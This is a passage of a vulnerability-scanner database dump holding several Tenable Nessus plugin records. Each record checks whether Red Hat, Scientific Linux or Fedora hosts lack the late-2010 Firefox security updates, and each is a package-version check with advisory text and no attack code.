attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0861.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0861\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"firefox-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"firefox-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"firefox-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"firefox-debuginfo-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"firefox-debuginfo-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"firefox-debuginfo-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"xulrunner-1.9.2.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"xulrunner-debuginfo-1.9.2.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"xulrunner-devel-1.9.2.12-1.el6_0\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo / xulrunner / xulrunner-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:37:18", "references": ["http://www.nessus.org/u?2c2c32e5"], "pluginID": "60889", "description": "A race condition flaw was found in the way Firefox handled Document Object Model (DOM) element properties. Malicious HTML content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text into HTML. A malformed file name on a Gopher server could, when accessed by a victim running Firefox, allow arbitrary JavaScript to be executed in the context of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could create a malicious web page that, when viewed by a victim, could steal private data from a different website the victim had loaded with Firefox. (CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH variable was appending a '.' character, which could allow a local attacker to execute arbitrary code with the privileges of a different user running Firefox, if that user ran Firefox from within an attacker-controlled directory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Firefox 3.6.11 and 3.6.12.\n\nAfter installing the update, Firefox must be restarted for the changes to take effect.", "edition": 4, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : firefox on SL6.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2013-11-27T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20101110_FIREFOX_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60889", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60889);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/11/27 17:06:04 $\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw was found in the way Firefox handled Document\nObject Model (DOM) element properties. Malicious HTML content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179,\nCVE-2010-3183, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted\ntext into HTML. A malformed file name on a Gopher server could, when\naccessed by a victim running Firefox, allow arbitrary JavaScript to be\nexecuted in the context of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker\ncould create a malicious web page that, when viewed by a victim, could\nsteal private data from a different website the victim had loaded with\nFirefox. (CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The\nLD_LIBRARY_PATH variable was appending a '.' character, which could\nallow a local attacker to execute arbitrary code with the privileges\nof a different user running Firefox, if that user ran Firefox from\nwithin an attacker-controlled directory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.11 and 3.6.12.\n\nAfter installing the update, Firefox must be restarted for the changes\nto take effect.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1103&L=scientific-linux-errata&T=0&P=5908\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c2c32e5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected firefox, xulrunner and / or xulrunner-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2013 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"firefox-3.6.12-1.el6_0\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xulrunner-1.9.2.12-1.el6_0\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xulrunner-devel-1.9.2.12-1.el6_0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:13", "references": ["http://www.nessus.org/u?0f9a0937", "http://www.nessus.org/u?d414eb29", "https://bugzilla.redhat.com/show_bug.cgi?id=642286", "https://bugzilla.redhat.com/show_bug.cgi?id=642294", "https://bugzilla.redhat.com/show_bug.cgi?id=642275", "http://www.nessus.org/u?ebdf7518", "http://www.nessus.org/u?5e5101ce", "http://www.nessus.org/u?c2308b45", "https://bugzilla.redhat.com/show_bug.cgi?id=642277", "https://bugzilla.redhat.com/show_bug.cgi?id=642283", "http://www.nessus.org/u?8a7474ff", "https://bugzilla.redhat.com/show_bug.cgi?id=646997", "http://www.nessus.org/u?d6343bde", "http://www.nessus.org/u?3b69c90e", "http://www.nessus.org/u?1d35dfe9", "https://bugzilla.redhat.com/show_bug.cgi?id=642300", "https://bugzilla.redhat.com/show_bug.cgi?id=642272", "https://bugzilla.redhat.com/show_bug.cgi?id=642290"], "pluginID": "50403", "description": "Update to new upstream Firefox version 3.6.12, fixing multiple security issues detailed in the upstream advisories :\n\n - http://www.mozilla.org/security/known-vulnerabilities/fi refox36.html#firefox3.6.11\n\n - http://www.mozilla.org/security/known-vulnerabilities/ firefox36.html#firefox3.6.12\n\nUpdate also includes all packages depending on gecko-libs rebuilt against new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2010-10-29T00:00:00", "title": "Fedora 14 : firefox-3.6.12-1.fc14 / galeon-2.0.7-35.fc14.1 / gnome-python2-extras-2.25.3-25.fc14.1 / etc (2010-16897)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2016-05-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xulrunner", "p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed", "cpe:/o:fedoraproject:fedora:14", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:gnome-web-photo", "p-cpe:/a:fedoraproject:fedora:galeon", "p-cpe:/a:fedoraproject:fedora:mozvoikko"], "id": "FEDORA_2010-16897.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50403", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-16897.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50403);\n script_version(\"$Revision: 1.18 $\");\n script_cvs_date(\"$Date: 2016/05/20 13:54:17 $\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253, 44425);\n script_xref(name:\"FEDORA\", value:\"2010-16897\");\n\n script_name(english:\"Fedora 14 : firefox-3.6.12-1.fc14 / galeon-2.0.7-35.fc14.1 / gnome-python2-extras-2.25.3-25.fc14.1 / etc (2010-16897)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream Firefox version 3.6.12, fixing multiple\nsecurity issues detailed in the upstream advisories :\n\n -\n http://www.mozilla.org/security/known-vulnerabilities/fi\n refox36.html#firefox3.6.11\n\n -\n http://www.mozilla.org/security/known-vulnerabilities/\n firefox36.html#firefox3.6.12\n\nUpdate also includes all packages depending on gecko-libs rebuilt\nagainst new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#firefox3.6.11\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebdf7518\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#firefox3.6.12\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a7474ff\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642300\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=646997\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050074.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e5101ce\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050075.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d414eb29\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050076.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c2308b45\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d6343bde\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050078.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3b69c90e\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050079.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f9a0937\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050080.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1d35dfe9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:galeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-web-photo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"firefox-3.6.12-1.fc14\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"galeon-2.0.7-35.fc14.1\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"gnome-python2-extras-2.25.3-25.fc14.1\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"gnome-web-photo-0.9-15.fc14.1\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"mozvoikko-1.0-16.fc14.1\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"perl-Gtk2-MozEmbed-0.08-6.fc14.21\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"xulrunner-1.9.2.12-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / galeon / gnome-python2-extras / gnome-web-photo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:07:50", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=642286", "http://www.nessus.org/u?413f0147", "https://bugzilla.redhat.com/show_bug.cgi?id=642294", "http://www.nessus.org/u?5e2e67ea", "https://bugzilla.redhat.com/show_bug.cgi?id=642275", "http://www.nessus.org/u?cd4f6a09", "http://www.nessus.org/u?c331941d", "https://bugzilla.redhat.com/show_bug.cgi?id=642277", "https://bugzilla.redhat.com/show_bug.cgi?id=642283", "https://bugzilla.redhat.com/show_bug.cgi?id=646997", "http://www.nessus.org/u?f01fc443", "http://www.nessus.org/u?e237b4ed", "http://www.nessus.org/u?5084c6e0", "http://www.nessus.org/u?b38de3df", "https://bugzilla.redhat.com/show_bug.cgi?id=642300", "http://www.nessus.org/u?7b4c5e7c", "https://bugzilla.redhat.com/show_bug.cgi?id=642272", "https://bugzilla.redhat.com/show_bug.cgi?id=642290"], "pluginID": "50422", "description": "Update to new upstream Firefox version 3.5.15, fixing multiple security issues detailed in the upstream advisories :\n\n - http://www.mozilla.org/security/known-vulnerabilities/fi refox35.html#firefox3.5.14\n\n - http://www.mozilla.org/security/known-vulnerabilities/ firefox35.html#firefox3.5.15\n\nUpdate also includes packages depending on gecko-libs rebuilt against new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2010-11-01T00:00:00", "title": "Fedora 12 : firefox-3.5.15-1.fc12 / galeon-2.0.7-27.fc12 / gnome-python2-extras-2.25.3-22.fc12 / etc (2010-16885)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2016-05-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xulrunner", "p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed", "cpe:/o:fedoraproject:fedora:12", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:gnome-web-photo", "p-cpe:/a:fedoraproject:fedora:galeon", "p-cpe:/a:fedoraproject:fedora:mozvoikko"], "id": "FEDORA_2010-16885.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50422", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-16885.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50422);\n script_version(\"$Revision: 1.19 $\");\n script_cvs_date(\"$Date: 2016/05/20 13:54:17 $\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253, 44425);\n script_xref(name:\"FEDORA\", value:\"2010-16885\");\n\n script_name(english:\"Fedora 12 : firefox-3.5.15-1.fc12 / galeon-2.0.7-27.fc12 / gnome-python2-extras-2.25.3-22.fc12 / etc (2010-16885)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream Firefox version 3.5.15, fixing multiple\nsecurity issues detailed in the upstream advisories :\n\n -\n http://www.mozilla.org/security/known-vulnerabilities/fi\n refox35.html#firefox3.5.14\n\n -\n http://www.mozilla.org/security/known-vulnerabilities/\n firefox35.html#firefox3.5.15\n\nUpdate also includes packages depending on gecko-libs rebuilt against\nnew version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.14\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e2e67ea\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.15\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c331941d\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 